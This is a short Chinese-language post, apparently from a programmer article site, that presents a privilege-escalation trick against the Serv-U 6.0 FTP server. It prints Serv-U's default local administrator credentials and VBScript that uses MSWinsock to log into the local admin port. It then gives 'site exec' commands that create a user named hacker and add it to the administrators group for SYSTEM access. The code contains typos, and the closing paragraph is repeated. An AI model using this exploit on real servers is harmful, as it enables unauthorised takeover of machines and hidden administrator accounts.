Serv-u6.0提权新招
程序员文章站
2022-09-29 20:09:05
适用环境:服务器禁用FSO,关掉Wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了Serv-U的管理员的密码。Serv-U默认用户名:localadministrator 密码:#|... 08-10-08...
适用环境:服务器禁用fso,关掉wscript.shelll,没有执行权限。
限制:没有更改管理员的密码,或者破解出了serv-u的管理员的密码。serv-u默认用户名:localadministrator 密码:#|@$ak#.|k;0@p 下面用mswinsock。winsock建立一个连接,并且以system权限添加超级用户,代码如下:
以下是引用片段:
dim revdata
dim sendata
set sock=createobject(“mswinsock.winsock”)
sock.protocol=0
sock.connect “127.0.0.1”,43958
sendata=”localadministrator”& chr(10) &chr(13)
sock.senddata snedata
sendata=”#|@$ak#.|k;0@p” &chr(10) &chr(13)
sock.senddata.sendata
使用这个代码就可以连上ftp了,接下来用sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add” 呵呵,就这样系统权限到手了,祝大家好运!
使用这个代码就可以连上ftp了,接下来用sock.senddata sendata 发送添加有执行权限用户的命令,想必大家该知道怎么做了吧,对了,就是用”site exec net user hacker hacker /add” “site exec net localgroup administrators hacker /add” 呵呵,就这样系统权限到手了,祝大家好运!